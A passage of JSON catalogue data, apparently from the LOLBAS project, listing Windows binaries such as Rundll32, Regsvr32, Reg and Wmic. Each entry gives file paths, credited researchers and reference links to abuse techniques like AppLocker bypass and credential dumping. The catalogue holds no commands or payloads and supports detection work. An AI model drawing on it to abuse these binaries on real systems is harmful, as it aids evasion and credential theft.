@elliotkillick"],"references":["https://github.com/LOLBAS-Project/LOLBAS/pull/153","https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/"],"count":1},{"id":"lolbas:pcalua-exe","name":"Pcalua.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\pcalua.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan @kylehanslovan","Fab @0rbz_"],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"],"count":3},{"id":"lolbas:pcwrun-exe","name":"Pcwrun.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken","Nasreddine Bencherchali @nas_bench"],"references":["https://twitter.com/pabraeken/status/991335019833708544","https://twitter.com/nas_bench/status/1535663791362519040","https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"],"count":2},{"id":"lolbas:pktmon-exe","name":"Pktmon.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"author":"Derek Johnson","created":"2020-08-12T00:00:00.000Z","contributors":["Derek Johnson"],"references":["https://binar-x79.com/windows-10-secret-sniffer/","https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"],"count":2},{"id":"lolbas:pnputil-exe","name":"Pnputil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\system32\\pnputil.exe"],"author":"Hai vaknin (lux)","created":"2020-12-25T00:00:00.000Z","contributors":["Hai Vaknin(Lux) @LuxNoBulIshit","Avihay eldad @aloneliassaf"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pnputil/"],"count":1},{"id":"lolbas:presentationhost-exe","name":"Presentationhost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"],"count":2},{"id":"lolbas:print-exe","name":"Print.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"],"count":3},{"id":"lolbas:printbrm-exe","name":"PrintBrm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"author":"Elliot Killick","created":"2021-06-21T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://twitter.com/elliotkillick/status/1404117015447670800","https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"],"count":2},{"id":"lolbas:provlaunch-exe","name":"Provlaunch.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\provlaunch.exe"],"author":"Grzegorz Tworek","created":"2023-06-30T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://twitter.com/0gtweet/status/1674399582162153472","https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/"],"count":1},{"id":"lolbas:psr-exe","name":"Psr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\psr.exe","c:\\windows\\syswow64\\psr.exe"],"author":"Leon Rodenko","created":"2020-06-27T00:00:00.000Z","contributors":["Leon Rodenko @L3m0nada"],"references":["https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx","https://lolbas-project.github.io/lolbas/Binaries/Psr/"],"count":1},{"id":"lolbas:query-exe","name":"Query.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\query.exe","c:\\windows\\syswow64\\query.exe"],"author":"Idan Lerman","created":"2025-07-31T00:00:00.000Z","contributors":["Idan Lerman @IdanLerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Query/"],"count":1},{"id":"lolbas:rasautou-exe","name":"Rasautou.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rasautou.exe"],"author":"Tony Lambert","created":"2020-01-10T00:00:00.000Z","contributors":["FireEye @FireEye"],"references":["https://github.com/fireeye/DueDLLigence","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/Binaries/Rasautou/"],"count":1},{"id":"lolbas:rdrleakdiag-exe","name":"rdrleakdiag.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"author":"John Dwyer","created":"2022-05-18T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"],"count":3},{"id":"lolbas:reg-exe","name":"Reg.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://pure.security/dumping-windows-credentials/","https://lolbas-project.github.io/lolbas/Binaries/Reg/"],"count":2},{"id":"lolbas:regasm-exe","name":"Regasm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regasm/"],"count":2},{"id":"lolbas:regedit-exe","name":"Regedit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\regedit.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regedit/"],"count":2},{"id":"lolbas:regini-exe","name":"Regini.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\regini.exe","C:\\Windows\\SysWOW64\\regini.exe"],"author":"Oddvar Moe","created":"2020-07-03T00:00:00.000Z","contributors":["Eli Salem @elisalem9"],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regini/"],"count":1},{"id":"lolbas:register-cimprovider-exe","name":"Register-cimprovider.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Register-cimprovider.exe","C:\\Windows\\SysWOW64\\Register-cimprovider.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Philip Tsukerman @PhilipTsukerman"],"references":["https://twitter.com/PhilipTsukerman/status/992021361106268161","https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/"],"count":1},{"id":"lolbas:regsvcs-exe","name":"Regsvcs.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"],"count":2},{"id":"lolbas:regsvr32-exe","name":"Regsvr32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"count":6},{"id":"lolbas:replace-exe","name":"Replace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["elceef @elceef"],"references":["https://twitter.com/elceef/status/986334113941655553","https://twitter.com/elceef/status/986842299861782529","https://lolbas-project.github.io/lolbas/Binaries/Replace/"],"count":2},{"id":"lolbas:reset-exe","name":"Reset.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\reset.exe","c:\\windows\\syswow64\\reset.exe"],"author":"Matan Bahar","created":"2025-07-31T00:00:00.000Z","contributors":["Matan Bahar @Bl4ckShad3"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reset/"],"count":1},{"id":"lolbas:rpcping-exe","name":"Rpcping.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Vincent Yiu @vysecurity","Antonio Cocomazzi @splinter_code","ap @decoder_it"],"references":["https://github.com/vysec/RedTips","https://twitter.com/vysecurity/status/974806438316072960","https://twitter.com/vysecurity/status/873181705024266241","https://twitter.com/splinter_code/status/1421144623678988298","https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"],"count":2},{"id":"lolbas:rundll32-exe","name":"Rundll32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Oddvar Moe @oddvarmoe","Jimmy @bohops","Sailay @404death","Martin Ingesen @Mrtn9"],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"count":5},{"id":"lolbas:runexehelper-exe","name":"Runexehelper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\runexehelper.exe"],"author":"Grzegorz Tworek","created":"2022-12-13T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://twitter.com/0gtweet/status/1206692239839289344","https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/"],"count":1},{"id":"lolbas:runonce-exe","name":"Runonce.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\runonce.exe","C:\\Windows\\SysWOW64\\runonce.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://twitter.com/pabraeken/status/990717080805789697","https://cmatskas.com/configure-a-runonce-task-on-windows/","https://lolbas-project.github.io/lolbas/Binaries/Runonce/"],"count":1},{"id":"lolbas:runscripthelper-exe","name":"Runscripthelper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe","C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation"],"references":["https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc","https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/"],"count":1},{"id":"lolbas:sc-exe","name":"Sc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Sc/"],"count":2},{"id":"lolbas:schtasks-exe","name":"Schtasks.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/","https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"],"count":2},{"id":"lolbas:scp-exe","name":"scp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"author":"BinFault","created":"2026-06-03T00:00:00.000Z","contributors":["BinFault @binfault","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://gtfobins.org/gtfobins/scp/","https://lolbas-project.github.io/lolbas/Binaries/scp/"],"count":2},{"id":"lolbas:scriptrunner-exe","name":"Scriptrunner.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Tyrer @nicktyrer"],"references":["https://twitter.com/KyleHanslovan/status/914800377580503040","https://twitter.com/NickTyrer/status/914234924655312896","https://github.com/MoooKitty/Code-Execution","https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"],"count":2},{"id":"lolbas:setres-exe","name":"Setres.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\setres.exe"],"author":"Grzegorz Tworek","created":"2022-10-21T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://twitter.com/0gtweet/status/1583356502340870144","https://lolbas-project.github.io/lolbas/Binaries/Setres/"],"count":1},{"id":"lolbas:settingsynchost-exe","name":"SettingSyncHost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\SettingSyncHost.exe","C:\\Windows\\SysWOW64\\SettingSyncHost.exe"],"author":"Elliot Killick","created":"2021-08-26T00:00:00.000Z","contributors":["Adam @hexacorn","Elliot Killick @elliotkillick"],"references":["https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"],"count":2},{"id":"lolbas:sftp-exe","name":"Sftp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\OpenSSH\\sftp.exe"],"author":"Swachchhanda Shrawan Poudel","created":"2025-05-13T00:00:00.000Z","contributors":["Swachchhanda Shrawan Poudel @_swachchhanda_","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/","https://lolbas-project.github.io/lolbas/Binaries/Sftp/"],"count":2},{"id":"lolbas:sigverif-exe","name":"Sigverif.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\sigverif.exe","C:\\Windows\\SysWOW64\\sigverif.exe"],"author":"Moshe Kaplan","created":"2021-11-08T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet","Adam @Hexacorn"],"references":["https://twitter.com/0gtweet/status/1457676633809330184","https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Sigverif/"],"count":1},{"id":"lolbas:ssh-exe","name":"ssh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"author":"Akshat Pradhan","created":"2021-11-08T00:00:00.000Z","contributors":["Akshat Pradhan","Felix Boulet","Edo Maland"],"references":["https://gtfobins.github.io/gtfobins/ssh/","https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9","https://lolbas-project.github.io/lolbas/Binaries/ssh/"],"count":3},{"id":"lolbas:stordiag-exe","name":"Stordiag.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\stordiag.exe","c:\\windows\\syswow64\\stordiag.exe"],"author":"Eral4m","created":"2021-10-21T00:00:00.000Z","contributors":["Eral4m @eral4m","Ekitji @eki_erk"],"references":["https://twitter.com/eral4m/status/1451112385041911809","https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"],"count":2},{"id":"lolbas:syncappvpublishingserver-exe","name":"SyncAppvPublishingServer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.exe","C:\\Windows\\SysWOW64\\SyncAppvPublishingServer.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Landers @monoxgas"],"references":["https://twitter.com/monoxgas/status/895045566090010624","https://lolbas-project.github.io/lolbas/Binaries/SyncAppvPublishingServer/"],"count":1},{"id":"lolbas:tar-exe","name":"Tar.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"author":"Brian Lucero","created":"2023-01-30T00:00:00.000Z","contributors":["Brian Lucero @Cyber_Sorcery","Avester Fahimipour"],"references":["https://twitter.com/Cyber_Sorcery/status/1619819249886969856","https://lolbas-project.github.io/lolbas/Binaries/Tar/"],"count":3},{"id":"lolbas:ttdinject-exe","name":"Ttdinject.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ttdinject.exe","C:\\Windows\\Syswow64\\ttdinject.exe"],"author":"Maxime Nadeau","created":"2020-05-12T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","Maxime Nadeau @m_nad0"],"references":["https://twitter.com/Oddvarmoe/status/1196333160470138880","https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"],"count":2},{"id":"lolbas:tttracer-exe","name":"Tttracer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\tttracer.exe","C:\\Windows\\SysWOW64\\tttracer.exe"],"author":"Oddvar Moe","created":"2019-11-05T00:00:00.000Z","contributors":["Onur Ulusoy @oulusoyum","Matt Graeber @mattifestation"],"references":["https://twitter.com/oulusoyum/status/1191329746069655553","https://twitter.com/mattifestation/status/1196390321783025666","https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html","https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"],"count":2},{"id":"lolbas:unregmp2-exe","name":"Unregmp2.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\unregmp2.exe","C:\\Windows\\SysWOW64\\unregmp2.exe"],"author":"Wade Hickey","created":"2021-12-06T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://twitter.com/notwhickey/status/1466588365336293385","https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/"],"count":1},{"id":"lolbas:vbc-exe","name":"vbc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe"],"author":"Lior Adar","created":"2020-02-27T00:00:00.000Z","contributors":["Lior Adar","Hai Vaknin(Lux)"],"references":["https://lolbas-project.github.io/lolbas/Binaries/vbc/"],"count":2},{"id":"lolbas:verclsid-exe","name":"Verclsid.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\verclsid.exe","C:\\Windows\\SysWOW64\\verclsid.exe"],"author":"@bohops","created":"2018-12-04T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer"],"references":["https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"],"count":1},{"id":"lolbas:vssadmin-exe","name":"Vssadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\vssadmin.exe"],"author":"mmadersbacher","created":"2026-08-16T00:00:00.000Z","contributors":[],"references":["https://attack.mitre.org/techniques/T1490/","https://github.com/Neo23x0/Raccine","https://lolbas-project.github.io/lolbas/Binaries/Vssadmin/"],"count":1},{"id":"lolbas:wab-exe","name":"Wab.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Mail\\wab.exe","C:\\Program Files (x86)\\Windows Mail\\wab.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @Hexacorn"],"references":["https://twitter.com/Hexacorn/status/991447379864932352","http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Wab/"],"count":1},{"id":"lolbas:wbadmin-exe","name":"wbadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbadmin.exe"],"author":"Chris Eastwood","created":"2024-04-05T00:00:00.000Z","contributors":[],"references":["https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960","https://lolbas-project.github.io/lolbas/Binaries/wbadmin/"],"count":2},{"id":"lolbas:wbemtest-exe","name":"wbemtest.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\wbem\\wbemtest.exe"],"author":"saulpanders","created":"2025-04-22T00:00:00.000Z","contributors":["Paul Sanders @saulpanders"],"references":["https://saulpanders.github.io/2025/01/20/lolbas-wbemtest.html","https://lolbas-project.github.io/lolbas/Binaries/wbemtest/"],"count":1},{"id":"lolbas:winget-exe","name":"winget.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"author":"Paul Sanders","created":"2022-01-03T00:00:00.000Z","contributors":["Paul @saulpanders","Konrad 'unrooted' Klawikowski","Fredrik H. Brathen"],"references":["https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html","https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended","https://www.youtube.com/watch?v=zuL7x4Wltto","https://lolbas-project.github.io/lolbas/Binaries/winget/"],"count":3},{"id":"lolbas:wlrmdr-exe","name":"Wlrmdr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\wlrmdr.exe"],"author":"Moshe Kaplan","created":"2022-02-16T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet","Oddvar Moe @Oddvarmoe","Freddy @falsneg"],"references":["https://twitter.com/0gtweet/status/1493963591745220608","https://twitter.com/Oddvarmoe/status/927437787242090496","https://twitter.com/falsneg/status/1461625526640992260","https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw","https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/"],"count":1},{"id":"lolbas:wmic-exe","name":"Wmic.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Avihay Eldad @AvihayEldad"],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"count":7},{"id":"lolbas:workfolders-exe","name":"WorkFolders.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\WorkFolders.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["John Carroll @YoSignals","Elliot Killick @elliotkillick","Naor Evgi @ghosts621"],"references":["https://www.ctus.io/2021/04/12/exploading/","https://twitter.com/ElliotKillick/status/1449812843772227588","https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"],"count":2},{"id":"lolbas:wscript-exe","name":"Wscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wscript.exe","C:\\Windows\\SysWOW64\\wscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","SaiLay(valen) @404death"],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Wscript/"],"count":2},{"id":"lolbas:wsreset-exe","name":"Wsreset.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wsreset.exe"],"author":"Oddvar Moe","created":"2019-03-18T00:00:00.000Z","contributors":["Hashim Jawad 